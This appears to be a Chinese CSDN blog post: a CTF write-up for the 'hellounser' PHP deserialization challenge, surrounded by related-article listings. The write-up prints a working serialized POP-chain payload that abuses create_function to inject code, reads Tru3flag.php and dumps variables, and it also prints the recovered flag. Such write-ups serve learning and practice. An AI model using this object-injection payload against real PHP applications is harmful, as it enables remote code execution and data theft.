hellounser—web反序列化

最新推荐文章于 2021-10-03 15:46:09 发布
最新推荐文章于 2021-10-03 15:46:09 发布
阅读量186 收藏
点赞数
分类专栏: web ctf buuctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51984332/article/details/120493152
版权
web 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
ctf
3 篇文章 0 订阅
订阅专栏
buuctf
1 篇文章 0 订阅
订阅专栏
"本文探讨了一段PHP代码,涉及反序列化和魔术函数的使用,通过精心构造payload,利用create_function绕过安全检查,最终在Tru3flag.php中找到flag:flag{cd71fedc-9069-4674-a89c-282e48e13bb5}
摘要由CSDN通过智能技术生成

hellounser
难度系数:3
题目描述:无
解题工具:火狐浏览器、php、sublime、在线base64加密(https://www.qqxiuzi.cn/bianma/base64.htm)
解题思路:打开场景,是一串php脚本代码,审计代码,涉及到反序列化知识和魔法函数,通过preg_match()函数过滤了参数,构造payload,具体如下步骤,导入到php中,构造pop链,
pop=O:1:“A”:1:{s:3:“var”;O:1:“B”:2:{s:4:“func”;s:15:“create_function”;s:3:“arg”;s:73:"}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";}},得到flag。
构造payload思路:触发A的__invoke(),通过echo $this->var,触发B类中__toString()函数,最后调用B中的show()方法,中间还有preg_match()函数要绕过。
注:pop=O:1:“A”:1:{s:3:“var”;O:1:“B”:2:{s:4:“func”;s:15:“create_function”;s:3:“arg”;s:32:"}var_dump(get_defined_vars());//";}}通过这个pop链发现flag不在flag.php中,但是在Tru3flag.php文件中,对Tru3flag.php进行base64加密。
参考文件:([BJDCTF2020]EzPHP)https://www.freesion.com/article/57661065075/(第五点比较关键)
https://www.sohu.com/a/299747481_99907709
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述flag{cd71fedc-9069-4674-a89c-282e48e13bb5}

总有妖怪想害朕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java反序列化工具
11-21
类似地,WebLogic也可能在处理反序列化的JMX(Java管理扩展)或Web服务请求时遇到安全问题。 3. **WebSphere**:IBM的产品,同样遵循Java EE标准。反序列化漏洞可能出现在处理JNDI(Java命名和目录接口)查找、EJB...
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫
09-25 1305
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp
Airwooh的博客
09-25 1646
排名28,还是太菜了,web就出了一道,eur1ka yyds MISC Girlfriend’s account import re import xlrd data=xlrd.open_workbook("D:\webtest\information.xls") table = data.sheets()[0] nrows = table.nrows price=table.col_values(0, start_rowx=1, end_rowx=5001) number=table.col.
[BJDCTF2020]EzPHP&DASCTF-sep:hellounser
weixin_47813861的博客
10-03 564
EzPHP 查看源码,然后base32解密一下进入对应文件。 无语的是环境应该是出了问题,一上来就报“fxck”,导致那串代码根本没法绕过。最后破案了,需要把cookie清理一下。 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<b
[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser
cosmoslin的博客
09-28 592
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function show(){
【DASCTF中北大学】EasyUnser PHP反序列化字符串逃逸
_Kisaragi_的博客
06-07 292
题目 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
c#序列化和反序列化
05-24
### C#中的序列化与反序列化 #### 一、序列化概述 序列化是将对象的状态转换为可持久化的形式的过程。在计算机科学中,序列化常常用于将对象的状态保存到磁盘或其他存储媒介中,或者在网络上传输对象状态。这种技术...
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
PHP序列化和反序列化漏洞
CyhDl666的博客
01-30 648
文章目录序列化序列化数组序列化对象反序列化序列化漏洞+实例_wakeup()漏洞的绕过攻防世界:unserialize3攻防世界:Web_php_unserialize函数同名方法利用session利用 序列化 序列化数组 serialize()函数可以序列化对象和数组返回一个字符串 序列化数组 <?php $sites = array('Google', 'Runoob', 'Facebook'); $serialized_data = serialize($sites); echo $ser
攻防世界 reverse新手题 Hello, CTF
空舟的博客
08-02 1796
Hello, CTF 运行一下,请输入序列 查看一下,无壳,32bit 用32位ida打开,找到main函数,F5查看伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { signed int v3; // ebx char v4; // al int result; // eax int v6; // [esp+0h] [ebp-70h] int v7; // [esp+0h] [ebp-70h
财务报表应付账款清单.xls
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于MATLAB车牌识别系统系统GUI面板.zip
最新发布
08-09
MATLAB车牌检测和识别系统可以用于自动识别车辆的车牌信息。以下是一个简单的实现步骤: 1. 车牌检测:使用图像处理技术来提取车牌区域。可以通过颜色、形状、纹理等特征来识别车牌区域。 2. 车牌字符分割:通过图像处理技术将车牌区域中的字符分割出来,形成单独的字符图像。 3. 字符识别:使用机器学习或深度学习算法来对字符图像进行识别。可以使用已有的字符数据集进行训练,或使用现有的字符识别模型进行预测。 4. 字符序列重组:将识别出的字符按照顺序重组,形成车牌号码。 5. 车牌信息输出:将识别出的车牌号码输出到目标文件或显示在屏幕上。 MATLAB提供了丰富的图像处理和机器学习工具箱,可以方便地实现车牌检测和识别系统。可以使用MATLAB中的图像处理函数、机器学习算法和深度学习框架来进行系统开发。同时,MATLAB还提供了图形界面工具,可以方便地设计用户界面,使系统更易于使用。
JAVA+SQL电子通讯录带系统托盘(论文+源代码).rar
08-09
1、安装jdk1.5.0 2、如果是B/S结构程序,请复制jakarta-tomcat-5.0.28这个文件夹下的 所有文件到你的E盘根目录下(不是固定的) 3、配置环境变量: (1)我的电脑—右键—属性—高级—环境变量—系统变量—新建,变量名:JAVA_HOME ,注意为大写,变量值:你所安装JDK的根目录,如:C:\Program Files\Java\jdk1.5.0; (2)我的电脑—右键—属性—高级—环境变量—系统变量—新建,变量名:CLASSPATH ,注意为大写,变量值:你所安装JDK的根目录下的lib文件夹,如:C:\Program Files\Java\jdk1.5.0\lib\tools.jar;.注意后面以分号和一个点结尾; (3)修改path变量:我的电脑—右键—属性—高级—环境变量—系统变量—选择path,点编辑,在变量名最后增加一个分号,增加你安装的JDK的根目录下的bin文件夹:C:\Program Files\Java\jdk1.5.0\bin; (4)如果是B/S结构程序,我的电脑—右键—属性—高级—环境变量—系统变量—新建,变量名:TOMCAT_HO
基于Springboot的养老院管理系统 Javaee项目,springboot项目
08-09
资源详情:https://blog.csdn.net/2302_78191516/article/details/141072272
财务单据-付款申请书.xls
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
IATF16949与TS16949差异分析表(最全完整版).xls
08-09
IATF16949与TS16949差异分析表(最全完整版)
【BP预测】基于布谷鸟算法优化BP神经网络实现数据预测Matlab代码.rar
08-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Java对象序列化与反序列化详解
"本章主要介绍了Java对象的序列化与反序列化,包括基本概念、实现过程、相关接口以及注意事项。" 在Java编程中,对象的序列化与反序列化是两个重要的概念。对象序列化是将Java对象转换为可存储或可传输的二进制字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值